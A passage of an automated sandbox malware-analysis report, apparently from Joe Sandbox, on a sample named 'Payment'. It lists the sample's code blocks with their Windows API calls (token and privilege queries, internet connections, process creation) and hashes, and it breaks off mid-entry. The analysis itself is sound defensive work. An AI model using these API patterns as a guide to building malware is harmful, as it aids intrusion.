                                                          • Instruction Fuzzy Hash: 36313271900118AFDB00EFA5C985AEFB7FDEF58304F1040AAE416E7251EA759E05CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • GetCursorPos.USER32(?), ref: 00B5C7C2
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B0BBFB,?,?,?,?,?), ref: 00B5C7D7
                                                          • GetCursorPos.USER32(?), ref: 00B5C824
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B0BBFB,?,?,?), ref: 00B5C85E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 28b740ca58e5d717d37cc6280cdc9e608e997d8eba4e12196f78366079453ab3
                                                          • Instruction ID: a1cea4ccd20afc3712218182cc01c8152d95461ac06760170110200754af93aa
                                                          • Opcode Fuzzy Hash: 28b740ca58e5d717d37cc6280cdc9e608e997d8eba4e12196f78366079453ab3
                                                          • Instruction Fuzzy Hash: D7318C35600218AFCB159F58D8D8FBABFF6EB09351F0440EAF9058B261C7319D54DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B28652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B28669
                                                            • Part of subcall function 00B28652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B28673
                                                            • Part of subcall function 00B28652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B28682
                                                            • Part of subcall function 00B28652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B28689
                                                            • Part of subcall function 00B28652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B2869F
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B28BEB
                                                          • _memcmp.LIBCMT ref: 00B28C0E
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B28C44
                                                          • HeapFree.KERNEL32(00000000), ref: 00B28C4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: 1bb0d0cec1698603124b568e50f17f8c5d0de7e85e41c78ea9d114f425dac829
                                                          • Instruction ID: 1d50030e93c752c90d4b45824d254951c8f36069e97d5fc9f0bff3111d7d44c1
                                                          • Opcode Fuzzy Hash: 1bb0d0cec1698603124b568e50f17f8c5d0de7e85e41c78ea9d114f425dac829
                                                          • Instruction Fuzzy Hash: 2621AC71E02219EFDB00DFA4D948BEEB7F8EF40355F184099E558A7240DB31AE06CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __setmode.LIBCMT ref: 00AF0BF2
                                                            • Part of subcall function 00AD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B37B20,?,?,00000000), ref: 00AD5B8C
                                                            • Part of subcall function 00AD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B37B20,?,?,00000000,?,?), ref: 00AD5BB0
                                                          • _fprintf.LIBCMT ref: 00AF0C29
                                                          • OutputDebugStringW.KERNEL32(?), ref: 00B26331
                                                            • Part of subcall function 00AF4CDA: _flsall.LIBCMT ref: 00AF4CF3
                                                          • __setmode.LIBCMT ref: 00AF0C5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 917c67d11a665cfe926eaa76b00736e1087c574af20b7a3c452d86ee0c440f14
                                                          • Instruction ID: e283a18c19762b9c14fa09160a09a0d59ad68f73aa83df87bf5c459faabd10ea
                                                          • Opcode Fuzzy Hash: 917c67d11a665cfe926eaa76b00736e1087c574af20b7a3c452d86ee0c440f14
                                                          • Instruction Fuzzy Hash: 00112432A0420C7ACB04B3F8AD86EBF7BA99F49320F14015AF305972A2DE615D828395
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B41A97
                                                            • Part of subcall function 00B41B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B41B40
                                                            • Part of subcall function 00B41B21: InternetCloseHandle.WININET(00000000), ref: 00B41BDD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: db79361f7ef026a9ca6bfce1c85d15b38f43839a72a69a63303a0da0446f5783
                                                          • Instruction ID: 65a0d453dd085023c81fddc77a9c34924f58829973edb0c5038de1285ba64bda
                                                          • Opcode Fuzzy Hash: db79361f7ef026a9ca6bfce1c85d15b38f43839a72a69a63303a0da0446f5783
                                                          • Instruction Fuzzy Hash: FC21CF31600601BFDB129F648C40FBABBEDFF88701F10049AFA5197650EB31EA51BBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B2F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B2E1C4,?,?,?,00B2EFB7,00000000,000000EF,00000119,?,?), ref: 00B2F5BC
                                                            • Part of subcall function 00B2F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00B2F5E2
                                                            • Part of subcall function 00B2F5AD: lstrcmpiW.KERNEL32(00000000,?,00B2E1C4,?,?,?,00B2EFB7,00000000,000000EF,00000119,?,?), ref: 00B2F613
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B2E1DD
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B2E203
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00B2E237
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 88972ccee15ca439ba7a8f233d22aa0630f908546abf786674c9c8199470c496
                                                          • Instruction ID: 632208995f1b55d874b6d1f95bad02a004d489dfd3810c22292877d6a9556669
                                                          • Opcode Fuzzy Hash: 88972ccee15ca439ba7a8f233d22aa0630f908546abf786674c9c8199470c496
                                                          • Instruction Fuzzy Hash: F211AC36200315EBCB25AF75E845A7A77F8FF84350B4040AAF91ACB2A0EF71D850C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 00B05351
                                                            • Part of subcall function 00AF594C: __FF_MSGBANNER.LIBCMT ref: 00AF5963
                                                            • Part of subcall function 00AF594C: __NMSG_WRITE.LIBCMT ref: 00AF596A
                                                            • Part of subcall function 00AF594C: RtlAllocateHeap.NTDLL(01470000,00000000,00000001,00000000,?,?,?,00AF1013,?), ref: 00AF598F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 8a01737f784606249f252721cbda85da32828e354b57ed932e6e32464bd8125c
                                                          • Instruction ID: 58c1d3a241d9231a6eb39f4027d4eb1d8843ad5b1c77780491739c77edf702f2
                                                          • Opcode Fuzzy Hash: 8a01737f784606249f252721cbda85da32828e354b57ed932e6e32464bd8125c
                                                          • Instruction Fuzzy Hash: CA11C432504A19AECF312FB0AD4577F7FD89F103E0B1044AAFA06975D0DF7589408B98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00AD4560
                                                            • Part of subcall function 00AD410D: _memset.LIBCMT ref: 00AD418D
                                                            • Part of subcall function 00AD410D: _wcscpy.LIBCMT ref: 00AD41E1
                                                            • Part of subcall function 00AD410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AD41F1
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00AD45B5
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AD45C4
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B0D6CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: 6380a08fa1a7771cdac85469e3ddc8d9023b017e5234e3972998e8e0a727fa9d
                                                          • Instruction ID: 5acca0d8e6d4876323d73fb05b3afccd387842dfd1693493aff533ab5a8adc30
                                                          • Opcode Fuzzy Hash: 6380a08fa1a7771cdac85469e3ddc8d9023b017e5234e3972998e8e0a727fa9d
                                                          • Instruction Fuzzy Hash: F7218E70904784ABEB328B649899BE7BFEC9F05308F0400DEE69E57281CBB55E849B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B37B20,?,?,00000000), ref: 00AD5B8C
                                                            • Part of subcall function 00AD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B37B20,?,?,00000000,?,?), ref: 00AD5BB0
                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00B466AC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B466B7
                                                          • _memmove.LIBCMT ref: 00B466E4
                                                          • inet_ntoa.WSOCK32(?), ref: 00B466EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: 3d480965314cd8b0c7f7b9325ff31c826df4376ed821b8ec9ff45c34b7ed2ce3
                                                          • Instruction ID: bfdfa256da1f1e589b1be2e5c604cc9454a09e9c6b280ac830616e7fc99ca231
                                                          • Opcode Fuzzy Hash: 3d480965314cd8b0c7f7b9325ff31c826df4376ed821b8ec9ff45c34b7ed2ce3
                                                          • Instruction Fuzzy Hash: 5D112E35900509AFCB04EFA4DE96DEEB7B8AF48311B1440A6F506A7261DF31AF04DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B29043
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B29055
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B2906B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B29086
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: d3067911f634292b63aa78a0012ba709810d33fa9ae89682f7960ec551d031a6
                                                          • Instruction ID: 0622b0c453630ea543f9c61c801b872665a8b504384792f203a13e463c1f7654
                                                          • Opcode Fuzzy Hash: d3067911f634292b63aa78a0012ba709810d33fa9ae89682f7960ec551d031a6
                                                          • Instruction Fuzzy Hash: F7111C79901218FFEB11DFA5C985EAEBBB4FB48710F2040A5EA08B7250D6716E50DB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 00AD12D8
                                                          • GetClientRect.USER32(?,?), ref: 00B0B84B
                                                          • GetCursorPos.USER32(?), ref: 00B0B855
                                                          • ScreenToClient.USER32(?,?), ref: 00B0B860
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: 32fe0d3bd7a9da93521ffdbeba53af2b0791a88a3a4bb87d80b89e56c47ce91d
                                                          • Instruction ID: 02f86a66a92209c37006eec6a808cade862339ae6d28d2d0cefb69086a6d5958
                                                          • Opcode Fuzzy Hash: 32fe0d3bd7a9da93521ffdbeba53af2b0791a88a3a4bb87d80b89e56c47ce91d
                                                          • Instruction Fuzzy Hash: 50110A3590011ABFCB10EFA4D985EFEB7B9EB05301F1044A6F912E7251DB31BA52CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B301FD,?,00B31250,?,00008000), ref: 00B3166F
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B301FD,?,00B31250,?,00008000), ref: 00B31694
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B301FD,?,00B31250,?,00008000), ref: 00B3169E
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00B301FD,?,00B31250,?,00008000), ref: 00B316D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: ef32dcb0ab9f20d3c1a870eb6ebf4240b346e9e1af8841c8a5155200793ea1ac
                                                          • Instruction ID: 78cb7b8cb8cc63c8fbb14ecb5ce0c5fb0934402800628c01d251f836bdcb7020
                                                          • Opcode Fuzzy Hash: ef32dcb0ab9f20d3c1a870eb6ebf4240b346e9e1af8841c8a5155200793ea1ac
                                                          • Instruction Fuzzy Hash: 54115A31C01A1DE7CF00AFE9D98AAFEBBB8FF09742F144495EA40B2240CB3055609B96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: 6c5511d1637b2fb5143bc8670908f3f8709990b5f2f6b5625a122b1378250f4d
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: AE01803288414EBBCF525F84CC41CEE7FA2FF1A340B488595FA1858071CA37E9B1AB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00B5B59E
                                                          • ScreenToClient.USER32(?,?), ref: 00B5B5B6
                                                          • ScreenToClient.USER32(?,?), ref: 00B5B5DA
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B5B5F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: e8f8bb3c9eb44f296bab75117f3bd4976419d1f4d99cd59f43de1c246f336449
                                                          • Instruction ID: 712e5312a71067323ddf1f928cbdb946f8450efdb08bdadeae543beac3c6eba6
                                                          • Opcode Fuzzy Hash: e8f8bb3c9eb44f296bab75117f3bd4976419d1f4d99cd59f43de1c246f336449
                                                          • Instruction Fuzzy Hash: 5F1123B5D0024AAFDB41CF99D444AAEFBB5FB18311F1041A6E914A3220D775AA55CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B5B8FE
                                                          • _memset.LIBCMT ref: 00B5B90D
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B97F20,00B97F64), ref: 00B5B93C
                                                          • CloseHandle.KERNEL32 ref: 00B5B94E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3277943733-0
                                                          • Opcode ID: 4fee2086f28a5ada1f609b328c7bf80a3c2936a0a38a4114c260a6279a1f2b11
                                                          • Instruction ID: 393d30eaab34d20517555f82f1e65361eddd3ba0a46a2e02c97aed9f78af5293
                                                          • Opcode Fuzzy Hash: 4fee2086f28a5ada1f609b328c7bf80a3c2936a0a38a4114c260a6279a1f2b11
                                                          • Instruction Fuzzy Hash: 38F05EB35943447BF7106761AD09FBB7ADCEB09355F0040B2BB08E61A2DF71890087A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00B36E88
                                                            • Part of subcall function 00B3794E: _memset.LIBCMT ref: 00B37983
                                                          • _memmove.LIBCMT ref: 00B36EAB
                                                          • _memset.LIBCMT ref: 00B36EB8
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00B36EC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: 405ccf2f6f0a070aeb24cae0c9dfcb9daf6267c9dc96f8709bc70c7a538b05f4
